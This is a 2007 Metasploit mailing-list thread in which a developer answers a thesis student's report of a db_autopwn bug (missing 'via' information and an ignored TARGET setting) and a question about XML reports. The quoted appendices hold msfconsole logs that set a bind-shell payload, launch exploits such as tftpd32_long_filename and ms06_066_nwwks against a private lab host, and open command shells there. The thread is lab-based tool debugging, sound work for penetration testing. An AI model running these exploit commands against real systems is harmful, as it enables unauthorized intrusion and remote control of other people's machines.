Metasploit mailing list archives
Autopwn question [+generating Reports]
From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 7 Feb 2007 20:37:08 -0800
The via exploit not being set is most likely a bug. I'll try to look into that. It should be set in all contexts. At present, I don't think we have a method to serialize the contents of the database to XML. We had talked about doing this at one point, though. As far as I'm aware, the global datastore will not be consulted for automated attacks from db_autopwn. I think only exploits with default targets will function correctly. HD can correct me if I'm wrong. On Wed, Feb 07, 2007 at 11:12:42PM +0100, Dennis G?nnewig wrote:
Hi skape, i played around with db_autopwn till today and was faced with a quite strange behaviour: The way you described works quite fine. short: ====== use <exploit> set <variable> exploit -z sessions -l -v long: ====== appendix [1] But if i do it the following way, the via-information is missing. short: ======= load db_mysql db_connect user:password at localhost/msf1 db_autopwn -e -p sessions -l -v long: ===== appendix [2] i got only | Id Description Tunnel Via | -- ----------- ------ --- | 1 Command shell 192.168.111.1:3304 -> 192.168.111.12:7465 | 2 Command shell 192.168.111.1:2911 -> 192.168.111.12:7308 Is this a built-in barrier against script kiddies or actually a not wanted behaviour? I searched for helping files with strace ("strace -p <pid> (-e trace=file) -o ./strace_file.out /metasploit/msfconsole" + "msf> sessions -l -v") and lsof (lsof | grep /metas), but didn't find nothing suitable. While searching API-documentation for suitable variables, I found set_via(), but without any working ruby-ide and running out of time for my semester thesis I decided to ask the mailing list. === Furthermore are there any interfaces to take the output (scanned host(s), the scanned ports, the exploits which were able to create sessions, the time the systems were scanned etc) to generate a xml-report? And what do you think, how much time it would take for a programmer who is familiar with ruby and the msf to get such an extension of the msf working? === Another strange behaviour I found, when starting db_autopwn -e -p: Setting TARGET to 3 seems not to have any effect on exploits excuted by db_autopwn. Is this a problem between my ears ;), a wanted feature or to be leaded back to the beta status of the msf? Maybe it would be better to allow TARGET to be a normal string or an integer as Windows XP SP1 Eng can be a "2" in the context of one exploit (see [3]) and a "3" in another (see [4]) Best regards, dennis Appendix: (1)=============================================== ================================================== | msf> use windows/tftp/tftpd32_long_filename | msf exploit(tftpd32_long_filename)> set | | Global | ====== | | Name Value | ---- ----- | PAYLOAD windows/shell/bind_tcp | RHOST 192.168.111.12 | RPORT 69 | | Module: windows/tftp/tftpd32_long_filename | ========================================== | | Name Value | ---- ----- | EXITFUNC process | RPORT 69 | TARGET 3 | WfsDelay 0 | | msf exploit(tftpd32_long_filename)> exploit -z | [...] | msf exploit(tftpd32_long_filename)> sessions -l -v | or | msf > sessions -l -v | | Active sessions | =============== | | Id Description Tunnel Via | -- ----------- ------ --- | 1 Command shell 192.168.111.1:1502 -> 192.168.111.12:4444 windows/tftp/tftpd32_long_filename (2)=============================================== ================================================== | msf > load db_mysql | [*] Successfully loaded plugin: db_mysql | msf > db_connect user:password at localhost/msf1 | msf > db_hosts | [*] Host: 192.168.111.12 | msf > db_services | [*] Service: host=192.168.111.12 port=22 proto=tcp state=up name=ssh | [*] Service: host=192.168.111.12 port=135 proto=tcp state=up name=msrpc | [*] Service: host=192.168.111.12 port=139 proto=tcp state=up name=netbios-ssn | [*] Service: host=192.168.111.12 port=445 proto=tcp state=up name=microsoft-ds | [*] Service: host=192.168.111.12 port=1025 proto=tcp state=up name=msrpc | [*] Service: host=192.168.111.12 port=3389 proto=tcp state=up name=microsoft-rdp | [*] Service: host=192.168.111.12 port=5000 proto=tcp state=up name=upnp | [*] Service: host=192.168.111.12 port=5800 proto=tcp state=up name=vnc-http | [*] Service: host=192.168.111.12 port=5900 proto=tcp state=up name=vnc | [*] Service: host=192.168.111.12 port=123 proto=udp state=up name=ntp | [*] Service: host=192.168.111.12 port=135 proto=udp state=up name=msrpc | msf > db_add_ | db_add_host db_add_port | msf > db_add_port | [*] Usage: db_add_port [host] [port] [proto] | msf > db_add_port 192.168.111.12 69 udp | [*] Service: host=192.168.111.12 port=69 proto=udp state=up | | msf > setg TARGET 3 | TARGET => 3 | msf > setg | | Global | ====== | | Name Value | ---- ----- | PAYLOAD windows/shell/bind_tcp | RHOST 192.168.111.12 | RHOSTS 192.168.111.0/24 | RPORT 69 | TARGET 3 | msf > db_autopwn -e -p | [*] Launching exploit/windows/tftp/tftpd32_long_filename (4/76) against 192.168.111.12:69... | [*] >> Exception during launch from exploit/windows/tftp/tftpd32_long_filename: A target has not been selected. | [*] Launching exploit/windows/smb/ms06_066_nwwks (6/76) against 192.168.111.12:445... | [*] Started bind handler | [*] Connecting to the SMB service... | [*] Binding to e67ab081-9844-3521-9d32-834f038001c0:1.0 at ncacn_np:192.168.111.12[\nwwks] ... | [*] Launching exploit/windows/tftp/threectftpsvc_long_mode (15/76) against 192.168.111.12:69... | [*] Started bind handler | [*] Trying target 3CTftpSvc 2.0.1... | [*] Launching exploit/windows/ssl/ms04_011_pct (17/76) against 192.168.111.12:69... | [*] Started bind handler | | [...] | | msf > sessions -l -v | | Active sessions | =============== | | Id Description Tunnel Via | -- ----------- ------ --- | 1 Command shell 192.168.111.1:3304 -> 192.168.111.12:7465 | 2 Command shell 192.168.111.1:2911 -> 192.168.111.12:7308 (3)=============================================== ================================================== msf exploit(freesshd_key_exchange) > show targets Exploit targets: Id Name -- ---- 0 Windows 2000 Pro SP4 English 1 Windows XP Pro SP0 English 2 Windows XP Pro SP1 English (4)=============================================== ================================================== msf exploit(tftpd32_long_filename) > show targets Exploit targets: Id Name -- ---- 0 Windows NT 4.0 SP6a English 1 Windows 2000 Pro SP4 English 2 Windows XP Pro SP0 English 3 Windows XP Pro SP1 English
Current thread:
- Autopwn question L.vd.Eijk at mindef.nl (Jan 03)
- Autopwn question mmiller at hick.org (Jan 04)
- Autopwn question [+generating Reports] Dennis Günnewig (Feb 07)
- Autopwn question [+generating Reports] mmiller at hick.org (Feb 07)
- Autopwn question [+generating Reports] H D Moore (Feb 08)
- Autopwn question [+generating Reports] Dennis Günnewig (Feb 08)
- Autopwn question [+generating Reports] Dennis Günnewig (Feb 07)
- Autopwn question mmiller at hick.org (Jan 04)